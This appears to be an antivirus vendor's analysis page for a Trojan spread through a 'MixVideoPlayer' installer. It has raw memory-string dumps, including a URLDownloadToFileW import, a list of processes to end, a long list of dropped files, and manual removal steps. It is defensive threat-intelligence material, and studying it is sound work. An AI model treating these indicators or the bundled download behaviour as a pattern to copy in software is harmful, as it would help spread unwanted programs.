f:\dd\vctools\crt_bld\self_x86\crt\src\fileno.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fdopen.c

f:\dd\vctools\crt_bld\self_x86\crt\src\feoferr.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fputws.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fgets.c

f:\dd\vctools\crt_bld\self_x86\crt\src\clearerr.c

fMode == _CRTDBG_REPORT_MODE || (fMode & ~(_CRTDBG_MODE_FILE | _CRTDBG_MODE_DEBUG | _CRTDBG_MODE_WNDW)) == 0

_CrtSetReportMode

f:\dd\vctools\crt_bld\self_x86\crt\src\dbgrptt.c

nRptType >= 0 && nRptType < _CRT_ERRCNT

wcscpy_s(szOutMessage2, 4096, L"_CrtDbgReport: String too long or Invalid characters in String")

strcpy_s(szUserMessage, 4096, "_CrtDbgReport: String too long or IO Error")

_VCrtDbgReportA

strcpy_s(szOutMessage2, 4096, "_CrtDbgReport: String too long or Invalid characters in String")

wcscpy_s(szUserMessage, 4096, L"_CrtDbgReport: String too long or IO Error")

_VCrtDbgReportW

((ptloci->lc_category[category].wlocale != NULL) && (ptloci->lc_category[category].wrefcount != NULL)) || ((ptloci->lc_category[category].wlocale == NULL) && (ptloci->lc_category[category].wrefcount == NULL))

f:\dd\vctools\crt_bld\self_x86\crt\src\fputwc.c

f:\dd\vctools\crt_bld\self_x86\crt\src\ungetwc.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fgetwc.c

f:\dd\vctools\crt_bld\self_x86\crt\src\a_cmp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\strtod.c

f:\dd\vctools\crt_bld\self_x86\crt\src\gmtime64.c

KERNEL32.DLL

strcat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), rterrs[tblindx].rterrtxt)

strcat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), "\n\n")

strcpy_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), "Runtime Error!\n\nProgram: ")

_NMSG_WRITE

f:\dd\vctools\crt_bld\self_x86\crt\src\crt0msg.c

f:\dd\vctools\crt_bld\self_x86\crt\prebuild\eh\typname.cpp

f:\dd\vctools\crt_bld\self_x86\crt\src\winsig.c

WUSER32.DLL

f:\dd\vctools\crt_bld\self_x86\crt\src\_flsbuf.c

f:\dd\vctools\crt_bld\self_x86\crt\src\intel\fp8.c

f:\dd\vctools\crt_bld\self_x86\crt\prebuild\conv\cvt.c

f:\dd\vctools\crt_bld\self_x86\crt\src\isctype.c

f:\dd\vctools\crt_bld\self_x86\crt\src\expand.c

f:\dd\vctools\crt_bld\self_x86\crt\src\dtoxtm64.c

f:\dd\vctools\crt_bld\self_x86\crt\src\timeset.c

f:\dd\vctools\crt_bld\self_x86\crt\src\_filbuf.c

f:\dd\vctools\crt_bld\self_x86\crt\src\commit.c

f:\dd\vctools\crt_bld\self_x86\crt\src\write.c

f:\dd\vctools\crt_bld\self_x86\crt\src\_freebuf.c

f:\dd\vctools\crt_bld\self_x86\crt\src\ftelli64.c

f:\dd\vctools\crt_bld\self_x86\crt\src\lseek.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fseeki64.c

f:\dd\vctools\crt_bld\self_x86\crt\src\close.c

f:\dd\vctools\crt_bld\self_x86\crt\src\_open.c

f:\dd\vctools\crt_bld\self_x86\crt\src\stricmp.c

f:\dd\vctools\crt_bld\self_x86\crt\prebuild\include\strgtold12.inl

f:\dd\vctools\crt_bld\self_x86\crt\src\getcwd.c

strcpy_s(resultstr, resultsize, autofos.man)

f:\dd\vctools\crt_bld\self_x86\crt\prebuild\conv\cfout.c

f:\dd\vctools\crt_bld\self_x86\crt\src\getqloc.c

f:\dd\vctools\crt_bld\self_x86\crt\src\wctomb.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbtowc.c

_loc_update.GetLocaleT()->locinfo->mb_cur_max == 1 || _loc_update.GetLocaleT()->locinfo->mb_cur_max == 2

f:\dd\vctools\crt_bld\self_x86\crt\src\errmode.c

f:\dd\vctools\crt_bld\self_x86\crt\src\lseeki64.c

f:\dd\vctools\crt_bld\self_x86\crt\src\isatty.c

f:\dd\vctools\crt_bld\self_x86\crt\prebuild\tran\contrlfp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\_fptostr.c

f:\dd\vctools\crt_bld\self_x86\crt\src\getenv.c

f:\dd\vctools\crt_bld\self_x86\crt\src\open.c

0 && "Only UTF-16 little endian & UTF-8 is supported for reads"

f:\dd\vctools\crt_bld\self_x86\crt\src\mbsnbicm.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbsnbcmp.c

f:\dd\vctools\crt_bld\self_x86\crt\prebuild\conv\x10fout.c

f:\dd\vctools\crt_bld\self_x86\crt\src\strnicmp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\wcsnicmp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbsnbico.c

$f:\dd\vctools\crt_bld\self_x86\crt\src\setmode.c

f:\dd\vctools\crt_bld\self_x86\crt\src\strnicol.c

("CRT Logic error during setenv",0)

__crtsetenv

c:\%original file name%.exe

{8856F961-340A-11D0-A96B-00C04FD705A2}

All Files (*.*)

No error message is available.#Attempted an unsupported operation.$A required resource was unavailable.

Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.

Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else.1Encountered an unexpected error while reading %1.1Encountered an unexpected error while writing %1.

#Unable to load mail system support.

%original file name%.exe_908_rwx_005CE000_00002000:

<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo></assembly>

kernel32.dll

USER32.dll

ADVAPI32.dll

RegCloseKey

ole32.dll

SHELL32.dll

OLEAUT32.dll

SHLWAPI.dll

GDI32.dll

COMDLG32.dll

WINSPOOL.DRV

oledlg.dll

urlmon.dll

URLDownloadToFileW

dbghelp.dll

IPHLPAPI.DLL

RPCRT4.dll

OLEACC.dll

WININET.dll

%original file name%.exe_908_rwx_00BD0000_00002000:

The procedure %s could not be located in the DLL %s.

The ordinal %d could not be located in the DLL %s.

iexplore.exe_888:

%?9-*09,*19}*09

.text

`.data

.rsrc

msvcrt.dll

KERNEL32.dll

NTDLL.DLL

USER32.dll

SHLWAPI.dll

SHDOCVW.dll

Software\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess

IE-X-X

rsabase.dll

System\CurrentControlSet\Control\Windows

dw15 -x -s %u

watson.microsoft.com

IEWatsonURL

%s -h %u

iedw.exe

Iexplore.XPExceptionFilter

jscript.DLL

mshtml.dll

mlang.dll

urlmon.dll

wininet.dll

shdocvw.DLL

browseui.DLL

comctl32.DLL

IEXPLORE.EXE

iexplore.pdb

ADVAPI32.dll

MsgWaitForMultipleObjects

IExplorer.EXE

IIIIIB(II<.Fg

7?_____ZZSSH%

)z.UUUUUUUU

,....Qym

````2```

{.QLQIIIKGKGKGKGKGKG

;33;33;0

8888880

8887080

browseui.dll

shdocvw.dll

6.00.2900.5512 (xpsp.080413-2105)

Windows

Operating System

6.00.2900.5512

MixVideoPlayer.exe_1272_rwx_03CF0000_00010000:

PresentationFramework.classic

PresentationFramework.Aero

MixVideoPlayer.exe_1272_rwx_04940000_0000A000:

WindowsFormsIntegration

WPFFontCache_v0400.exe_4048:

.text

`.data

@.rsrc

@.reloc

t1Ht.Ht

Ht.Ht

8Y%u(

Ht.Ht$Ht

tGHt;Ht.Ht$Ht

!!"$%%&$%%&())*

%s %s line %d

SHELL32.dll

RPCRT4.dll

MSVCR100_CLR0400.dll

KERNEL32.dll

ADVAPI32.dll

RegNotifyChangeKeyValue

RegCloseKey

RegQueryInfoKeyW

RegOpenKeyExW

GetSystemWindowsDirectoryW

_crt_debugger_hook

_amsg_exit

wpffontcache_v0400.pdb

.?AVMalformedKeyException@@

.?AVNotSupportedException@@

6666666666666666

666666666666

6666666

8888888

!"#$%&'()* ,-./

0000000000000

#@$@$@$@$

@:@$@$@$@$@$@$@$@$@$@$

!"#$%&'()* ,-./0

%&'(gggg)* ,..........................................................................................MMMM..

4444444444444

#$%&'()* 

!!!!"#$%&'()* ,-./0123456789:;<=

KEYW

<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="wpffontcache_v0400" type="win32"></assemblyIdentity><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo></assembly>PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD

4 4}455<5

:":&:*:.:2:

0!0&0,03090?0

1 1$1(1,1014181

>0>8>`>~>

1$1@1\1|1

Software\Microsoft\Avalon.Graphics

kernel32.dll

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Fonts

MARLETT.TTF

E\\?\

\WPFFontCache_v0400-System.dat

{2da8dded-086f-4cb9-a77f-b974b9cb0186}

\\?\UNC\

{00000000-0000-0000-0000-000000000000}

\\?\Volume

yKERNEL32.DLL

KeySize

ElementMalformedKeyTask

CacheMissReportReceivedTask

wpffontcache_v0400.exe

4.0.30319.1 built by: RTMRel

.NET Framework

4.0.30319.1

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   mixvideoplayersetup.exe:460
   WPFFontCache_v0400.exe:4048
   DeleteTasks.exe:3024
   LTV2.exe:556
   LTV2.exe:1968
   LTV2.exe:3828
   

2. Delete the original Trojan file.
   
3. Delete or disinfect the following files created/modified by the Trojan:
   

   %Program Files%\MixVideoPlayer\Languages\ChineseT.ini (3 bytes)
   %Program Files%\MixVideoPlayer\Languages\Swedish.ini (3 bytes)
   %Program Files%\MixVideoPlayer\Languages\Danish.ini (3 bytes)
   %Program Files%\MixVideoPlayer\Languages\Hungarian.ini (3 bytes)
   %Program Files%\MixVideoPlayer\Languages\Estonian.ini (3 bytes)
   %Program Files%\MixVideoPlayer\dotNetFx40_Full_setup.exe (30344 bytes)
   %Program Files%\MixVideoPlayer\Languages\Slovak.ini (3 bytes)
   %Program Files%\MixVideoPlayer\policy.2.0.taglib-sharp.config (377 bytes)
   %Program Files%\MixVideoPlayer\BrowserWeb.exe (2392 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\System.dll (11 bytes)
   %Program Files%\MixVideoPlayer\references\libreria.png (244 bytes)
   %Program Files%\MixVideoPlayer\Languages\Norwegian.ini (3 bytes)
   %Program Files%\MixVideoPlayer\Languages\German.ini (3 bytes)
   %Program Files%\MixVideoPlayer\references\PhotoLoader.dll (784 bytes)
   %Program Files%\MixVideoPlayer\Languages\Slovenian.ini (3 bytes)
   %Program Files%\MixVideoPlayer\PhotoLoader.dll (784 bytes)
   %Program Files%\MixVideoPlayer\Languages\Czech.ini (3 bytes)
   %Program Files%\MixVideoPlayer\references\mixChecker.exe (27704 bytes)
   %Program Files%\MixVideoPlayer\Languages\Polish.ini (3 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\nsProcess.dll (4 bytes)
   %Program Files%\MixVideoPlayer\references\Interop.SHDocVw.dll (5064 bytes)
   %Program Files%\MixVideoPlayer\Languages\Catalan.ini (3 bytes)
   %Program Files%\MixVideoPlayer\Languages\ChineseS.ini (3 bytes)
   %Program Files%\MixVideoPlayer\mixvideoplayer.affcode (3 bytes)
   %Program Files%\MixVideoPlayer\uninstall.exe (4489 bytes)
   %Program Files%\MixVideoPlayer\icon.ico (12536 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\NSISdl.dll (14 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\ZipDLL.dll (6360 bytes)
   %Program Files%\MixVideoPlayer\Languages\Thai.ini (5 bytes)
   %Program Files%\MixVideoPlayer\references\extvideo.png (146 bytes)
   %Program Files%\MixVideoPlayer\references\extaudio.png (310 bytes)
   %Program Files%\MixVideoPlayer\Languages\Russian.ini (5 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\SimpleSC.dll (1856 bytes)
   %Program Files%\MixVideoPlayer\references\ffmpeg.zip (873025 bytes)
   %Program Files%\MixVideoPlayer\Languages\Bulgarian.ini (5 bytes)
   %Program Files%\MixVideoPlayer\Languages\Hindi.ini (6 bytes)
   %Program Files%\MixVideoPlayer\Languages\Latvian.ini (3 bytes)
   %Program Files%\MixVideoPlayer\NLog.dll (14184 bytes)
   %Program Files%\MixVideoPlayer\Languages\Italian.ini (3 bytes)
   %Program Files%\MixVideoPlayer\Languages\Korean.ini (3 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\AccessControl.dll (13 bytes)
   %Program Files%\MixVideoPlayer\Languages\French.ini (3 bytes)
   %Program Files%\MixVideoPlayer\Languages\Romanian.ini (3 bytes)
   %Program Files%\MixVideoPlayer\icon-uninstall.ico (3616 bytes)
   %Program Files%\MixVideoPlayer\Languages\Vietnamese.ini (4 bytes)
   %Program Files%\MixVideoPlayer\Newtonsoft.Json.dll (16944 bytes)
   %Program Files%\MixVideoPlayer\references\taglib-sharp.dll (15536 bytes)
   %Program Files%\MixVideoPlayer\FrameworkControl.exe (14184 bytes)
   %Program Files%\MixVideoPlayer\references\Newtonsoft.Json.dll (15536 bytes)
   %Program Files%\MixVideoPlayer\Languages\Indonesian.ini (3 bytes)
   %Documents and Settings%\All Users\Start Menu\Programs\MixVideoPlayer\Uninstall MixVideoPlayer.lnk (1 bytes)
   %Program Files%\MixVideoPlayer\Languages\HaitianCreole.ini (3 bytes)
   %Program Files%\MixVideoPlayer\Windows\Thumbs.db (1856 bytes)
   %Program Files%\MixVideoPlayer\Languages\Greek.ini (5 bytes)
   %Program Files%\MixVideoPlayer\Languages\Hebrew.ini (4 bytes)
   %Program Files%\MixVideoPlayer\Languages\Finnish.ini (3 bytes)
   %Program Files%\MixVideoPlayer\references\NDde.dll (3616 bytes)
   %Program Files%\MixVideoPlayer\taglib-sharp.dll (15536 bytes)
   %Program Files%\MixVideoPlayer\mixUpdater.exe (13368 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsg2.tmp (177700 bytes)
   %Program Files%\MixVideoPlayer\Snowplow.Tracker.dll (784 bytes)
   %Program Files%\MixVideoPlayer\MixVideoPlayer.exe (76078 bytes)
   %Program Files%\MixVideoPlayer\Languages\Japanese.ini (4 bytes)
   %Program Files%\MixVideoPlayer\Languages\Portuguese.ini (3 bytes)
   %Program Files%\MixVideoPlayer\Sider.dll (5064 bytes)
   %Program Files%\MixVideoPlayer\Windows\logopeq-icon.ico (9608 bytes)
   %Program Files%\MixVideoPlayer\LTV2.exe (6 bytes)
   %Program Files%\MixVideoPlayer\Controls\ifishplayer-icon2.ico (12536 bytes)
   %Program Files%\MixVideoPlayer\Languages\Ukrainian.ini (5 bytes)
   %Program Files%\MixVideoPlayer\Microsoft.Win32.TaskScheduler.dll (8560 bytes)
   %Program Files%\MixVideoPlayer\mixvideoplayer.uidnum (23 bytes)
   %Program Files%\MixVideoPlayer\Languages\Arabic.ini (4 bytes)
   %Program Files%\MixVideoPlayer\Languages\Turkish.ini (3 bytes)
   %Program Files%\MixVideoPlayer\references\ffmpeg.exe (202301 bytes)
   %Documents and Settings%\All Users\Start Menu\Programs\MixVideoPlayer\MixVideoPlayer.lnk (1 bytes)
   %Program Files%\MixVideoPlayer\references\folder.png (472 bytes)
   %Program Files%\MixVideoPlayer\references\policy.2.0.taglib-sharp.dll (3 bytes)
   %Program Files%\MixVideoPlayer\Languages\English.ini (3 bytes)
   %Program Files%\MixVideoPlayer\Controls\Thumbs.db (1552 bytes)
   %Documents and Settings%\All Users\Start Menu\Programs\Startup\WebBrowserMixVideoPlayer.lnk (1 bytes)
   %Program Files%\MixVideoPlayer\Languages\Spanish.ini (3 bytes)
   %Documents and Settings%\%current user%\Desktop\MixVideoPlayer.lnk (1 bytes)
   %Program Files%\MixVideoPlayer\references\policy.2.0.taglib-sharp.config (377 bytes)
   %Program Files%\MixVideoPlayer\DeleteTasks.exe (10 bytes)
   %Program Files%\MixVideoPlayer\references\Thumbs.db (5 bytes)
   %Program Files%\MixVideoPlayer\Languages\Lithuanian.ini (3 bytes)
   %Program Files%\MixVideoPlayer\policy.2.0.taglib-sharp.dll (3 bytes)
   %Program Files%\MixVideoPlayer\LTVNetSdk.dll (15 bytes)
   %Program Files%\MixVideoPlayer\Languages\Dutch.ini (3 bytes)
   %Documents and Settings%\%current user%\Cookies\[email protected][2].txt (501 bytes)
   %Documents and Settings%\%current user%\Local Settings\Application Data\mixvideoplayer\log.txt (134 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\MainBanner[1].htm (3 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\tmp4.tmp (326 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\banner[1].htm (3 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\analytics[1].js (740 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\jquery.min[2].js (4547 bytes)
   %Documents and Settings%\%current user%\Local Settings\Application Data\mixvideoplayer\config\config.ini (252 bytes)
   %Documents and Settings%\%current user%\Cookies\Current_User@mixvideoplayer[1].txt (187 bytes)
   %Documents and Settings%\%current user%\Cookies\index.dat (4240 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\jquery.min[1].js (3236 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\analytics[1].htm (1 bytes)
   %System%\d3d9caps.tmp (1324 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\jquery.min[1].js (3480 bytes)
   %Documents and Settings%\%current user%\Cookies\[email protected][1].txt (1002 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\ga[1].js (1691 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\loading-install[1].gif (74 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\MixVideoPlayerSetup[1].exe (1718416 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\loadingBar[1].gif (7527 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\style[1].css (114 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\i-download[1].png (1 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\f6c0be2d-f27d-4e15-a611-17b6bfc0345c\mixvideoplayersetup.exe (1718416 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\bullet-short[1].gif (54 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\progress-bar[1].png (1 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\msjava[1].dll (465777 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\style[1].css (3073 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\loadingBar[1].gif (12626 bytes)
   %System%\wbem\Logs\wbemprox.log (228 bytes)

4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   
5. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.